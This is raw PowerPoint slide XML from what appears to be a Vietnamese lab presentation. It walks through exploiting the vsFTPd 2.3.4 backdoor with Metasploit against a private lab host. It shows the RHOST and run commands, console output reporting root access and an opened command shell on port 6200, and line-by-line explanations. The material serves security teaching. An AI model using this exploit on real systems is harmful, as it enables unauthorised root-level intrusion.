              <a:t>: set RHOST 192.168.56.102: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lấy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>địa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chỉ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cần</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quét</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Chạy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: run: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quét</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chạy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> run:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] 192.168.56.102:21 - Banner: 220 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vsFTPd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2.3.4)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] 192.168.56.102:21 - USER: 331 Please specify the password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[+] 192.168.56.102:21 - Backdoor service has been spawned, handling...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[+] 192.168.56.102:21 - UID: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=0(root) gid=0(root)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Found shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Command shell session 1 opened (192.168.56.101:41293 -&gt; 192.168.56.102:6200) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>at 2024-09-19 07:59:03 -0400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="100148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148B5311-D976-4131-9BFC-1A6986234F0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="663985"/>
            <a:ext cx="9560118"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Banner</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00050" lvl="1" indent="0" defTabSz="914400" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>192.168.56.102:21 - Banner: 220 (</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>vsFTPd</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t> 2.3.4)</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rPr>
              <a:t>cho</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rPr>
              <a:t>biết</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rPr>
              <a:t>dịch</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rPr>
              <a:t>vụ</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>trên</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rPr>
              <a:t>cổng</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> 21 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>của</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rPr>
              <a:t>máy</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rPr>
              <a:t>mục</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0" defTabSz="914400" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>tiêu</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rPr>
              <a:t>đang</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rPr>
              <a:t>chạy</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rPr>
              <a:t>phiên</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rPr>
              <a:t>bản</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>vsFTPd</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 2.3.4</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phiên</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bản</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có</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chứa</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> backdoor.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 Prompt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Unicode MS"/>
              </a:rPr>
              <a:t>192.168.56.102:21 - USER: 331 Please specify the password</a:t>
            </a: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cho</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thấy</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rằng</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yêu</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cầu</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tên</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người</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dùng</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đã</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được</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đáp</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ứng</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và</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dịch</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vụ</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>đang</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yêu</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cầu</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mật</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khẩu</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>,</a:t>
            </a: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nhưng</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vì</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bạn</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đã</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kích</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hoạt</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> backdoor, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>bước</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này</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không</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còn</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quan</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trọng</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>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Backdoor Service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Unicode MS"/>
              </a:rPr>
              <a:t>Backdoor service has been spawned, handling...</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> </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err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>cho</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thấy</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rằng</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> backdoor </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>đã</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được</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kích</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hoạt</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và</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bạn</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đang</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xử</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lý</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kết</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nối</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1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UID/GID</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Unicode MS"/>
              </a:rPr>
              <a:t>UID: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>=0(root) gid=0(root)</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cho</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thấy</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bạn</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đã</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chiếm</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được</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quyền</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truy</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cập</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>root</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err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tức</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là</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bạn</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có</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toàn</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quyền</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kiểm</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soát</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hệ</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thống</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Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mở</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thành</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công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Unicode MS"/>
              </a:rPr>
              <a:t>Found shell.</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và</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a:rPr>
              <a:t>Command shell session 1 </a:t>
            </a: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Unicode MS"/>
              </a:rPr>
              <a:t>opened</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xác</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nhận</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rằng</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bạn</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đã</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mở</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được</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một</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> shell </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>từ</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a: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err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>xa</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trên</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máy</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mục</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tiêu</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thông</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> qua </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>cổng</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> 6200 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>mà</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> backdoor </a:t>
            </a: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err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>đã</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kích</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hoạt</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Bạn</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đang</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có</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quyền</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kiểm</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soát</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máy</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với</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quyền</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> root </a:t>
            </a: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err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>từ</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địa</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chỉ</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a:rPr>
              <a:t>192.168.56.101</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đến</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a:rPr>
              <a:t>192.168.56.102</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7994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EE01DE-852C-4ADA-AF9C-F3FF2A832D01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="341523"/>
            <a:ext cx="10515600" cy="5835440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Chúng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>tôi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>chạy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> ls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>chắc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>chắn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>rằng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>đã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>leo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> thang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>đặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>quyền</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
